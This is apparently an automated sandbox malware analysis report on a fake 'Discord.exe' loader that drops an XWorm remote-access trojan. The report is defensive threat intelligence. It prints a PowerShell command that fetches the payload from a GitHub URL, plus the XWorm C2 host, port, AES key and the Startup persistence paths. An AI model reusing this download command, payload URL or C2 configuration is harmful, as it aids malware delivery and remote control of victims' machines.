| File name: | Discord.exe |
| Full analysis: | https://app.any.run/tasks/4250ccbd-4919-4682-9aa1-58ac863ee7cc |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | January 02, 2025, 10:14:12 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32 executable (console) Intel 80386, for MS Windows, 5 sections |
| MD5: | C98883CCAF09EC8918C0A649BFE602F3 |
| SHA1: | D9C56C1E8E0F7ECE157F48ABE4CC9658D55C3D3A |
| SHA256: | B391E1E8BFC3434CCB8ADEC497EEC855BC4C14F0FC01A985E3549F59FDE8AA71 |
| SSDEEP: | 1536:7CYa+ihNuNMv2blAyHQ5MaAt7JmyxCV7tBKhilgVcRdMjjMOw:7CYa+0Nu6vQAkQ5S7JmyxCbBKhiTbMj0 |
| .exe | | | Win32 Executable MS Visual C++ (generic) (41) |
|---|---|---|
| .exe | | | Win64 Executable (generic) (36.3) |
| .dll | | | Win32 Dynamic Link Library (generic) (8.6) |
| .exe | | | Win32 Executable (generic) (5.9) |
| .exe | | | Win16/32 Executable Delphi generic (2.7) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2019:07:30 08:52:45+00:00 |
| ImageFileCharacteristics: | No relocs, Executable, No line numbers, No symbols, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 2.5 |
| CodeSize: | 70656 |
| InitializedDataSize: | 19968 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x1000 |
| OSVersion: | 4 |
| ImageVersion: | - |
| SubsystemVersion: | 4 |
| Subsystem: | Windows command line |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2192 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2464 | "C:\Users\admin\AppData\Roaming\Fortnite.exe" | C:\Users\admin\AppData\Roaming\Fortnite.exe | — | Discord.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 3221226540 Modules
| |||||||||||||||
| 3612 | "C:\Users\admin\AppData\Roaming\Runtime Broker.exe" | C:\Users\admin\AppData\Roaming\Runtime Broker.exe | Discord.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Description: Version: 1.0.0.0 Modules
XWorm(PID) Process(3612) Runtime Broker.exe C2associated-mercedes.gl.at.ply.gg:52527 Keys AES<123456789> Options Splitter<Xwormmm> Sleep time3 USB drop nameXWorm V5.6 MutexJpZXtAuEl4lpqduz | |||||||||||||||
| 3992 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | Fortnite.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4144 | "C:\Users\admin\Desktop\Discord.exe" | C:\Users\admin\Desktop\Discord.exe | — | explorer.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 4716 | powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ind1337xhtml/-wcx/raw/refs/heads/main/Discord.exe' -OutFile 'C:\Users\admin\AppData\Local\Temp\Discord.exe' -ErrorAction Stop" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5040 | "C:\WINDOWS\sysnative\cmd" /c "C:\Users\admin\AppData\Local\Temp\639F.tmp\63A0.tmp\63A1.bat C:\Users\admin\Desktop\Discord.exe" | C:\Windows\System32\cmd.exe | — | Discord.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5696 | "C:\Users\admin\AppData\Roaming\Fortnite.exe" | C:\Users\admin\AppData\Roaming\Fortnite.exe | Discord.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 3221225781 Modules
| |||||||||||||||
| 5732 | "C:\Users\admin\AppData\Local\Temp\Discord.exe" | C:\Users\admin\AppData\Local\Temp\Discord.exe | cmd.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Description: Exit code: 0 Version: 1.0.0.0 Modules
| |||||||||||||||
| 5916 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | Discord.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (3612) Runtime Broker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Runtime Broker_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (3612) Runtime Broker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Runtime Broker_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (3612) Runtime Broker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Runtime Broker_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (3612) Runtime Broker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Runtime Broker_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (3612) Runtime Broker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Runtime Broker_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (3612) Runtime Broker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Runtime Broker_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (3612) Runtime Broker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Runtime Broker_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
| (PID) Process: | (3612) Runtime Broker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Runtime Broker_RASMANCS |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (3612) Runtime Broker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Runtime Broker_RASMANCS |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (3612) Runtime Broker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Runtime Broker_RASMANCS |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 4716 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Discord.exe | — | |
MD5:— | SHA256:— | |||
| 5732 | Discord.exe | C:\Users\admin\AppData\Roaming\Runtime Broker.exe | executable | |
MD5:9492B52955D1C44B0A7846A6AD9B11EC | SHA256:2471322E0A10A9DD45F455ABEA0EDF95C13120B8D254DA755D81A1AAC023B2BA | |||
| 4144 | Discord.exe | C:\Users\admin\AppData\Local\Temp\639F.tmp\63A0.tmp\63A1.bat | text | |
MD5:7CAC02DAC5B233B8A5CC3D3468CDE5BC | SHA256:16CB39AD8262A76C3D5C9A183FE298F955620C052A6C9D385659CD842F9FFE9E | |||
| 3612 | Runtime Broker.exe | C:\Users\admin\AppData\Roaming\Update.exe | executable | |
MD5:9492B52955D1C44B0A7846A6AD9B11EC | SHA256:2471322E0A10A9DD45F455ABEA0EDF95C13120B8D254DA755D81A1AAC023B2BA | |||
| 5732 | Discord.exe | C:\Users\admin\AppData\Roaming\Fortnite.exe | executable | |
MD5:B2366CDF646D8D950B487DC896AF27B2 | SHA256:E025A711DF64C888E0A3CCE755EE75DE336046768B147BC43EA34B2B835C591C | |||
| 4716 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:FBDD74808D07A8DFF2FA806191939851 | SHA256:75AF58708F169F24EABF2E17D44F763596B298BCD7CC209AFDA29B8BD24AFA0E | |||
| 3612 | Runtime Broker.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk | lnk | |
MD5:A66B646FB292ED8023987CE1E9CAA169 | SHA256:DBC90B1F4C7D03A5BB5E2302BD62D1CCA9106BC2B5D665A038EF4FAB9BA77A63 | |||
| 4716 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2uvqdgwn.nr4.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4716 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5ehtxm3e.hxe.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
6060 | svchost.exe | GET | 200 | 2.16.241.12:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
6060 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.16.241.12:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 302 | 140.82.121.3:443 | https://github.com/ind1337xhtml/-wcx/raw/refs/heads/main/Discord.exe | unknown | — | — | unknown |
3612 | Runtime Broker.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/line/?fields=hosting | unknown | — | — | shared |
4712 | MoUsoCoreWorker.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 140.82.121.3:443 | https://raw.githubusercontent.com/ind1337xhtml/-wcx/refs/heads/main/Discord.exe | unknown | executable | 2.06 Mb | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4712 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 192.168.100.255:137 | — | — | — | whitelisted |
6060 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 2.23.209.149:443 | www.bing.com | Akamai International B.V. | GB | whitelisted |
— | — | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | 2.16.241.12:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
6060 | svchost.exe | 2.16.241.12:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
6060 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
4712 | MoUsoCoreWorker.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
github.com |
| shared |
raw.githubusercontent.com |
| shared |
ip-api.com |
| shared |
associated-mercedes.gl.at.ply.gg |
| unknown |
self.events.data.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
2192 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Attempting to access raw user content on GitHub |
2192 | svchost.exe | Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Check (ip-api .com) |
2192 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com) |
3612 | Runtime Broker.exe | Device Retrieving External IP Address Detected | ET POLICY External IP Lookup ip-api.com |
3612 | Runtime Broker.exe | Device Retrieving External IP Address Detected | POLICY [ANY.RUN] External Hosting Lookup by ip-api |
2192 | svchost.exe | Potentially Bad Traffic | ET INFO playit .gg Tunneling Domain in DNS Lookup |
3612 | Runtime Broker.exe | Misc Attack | ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 181 |
2192 | svchost.exe | Misc activity | ET INFO Tunneling Service in DNS Lookup (* .ply .gg) |
3612 | Runtime Broker.exe | Malware Command and Control Activity Detected | REMOTE [ANY.RUN] Xworm TCP Packet |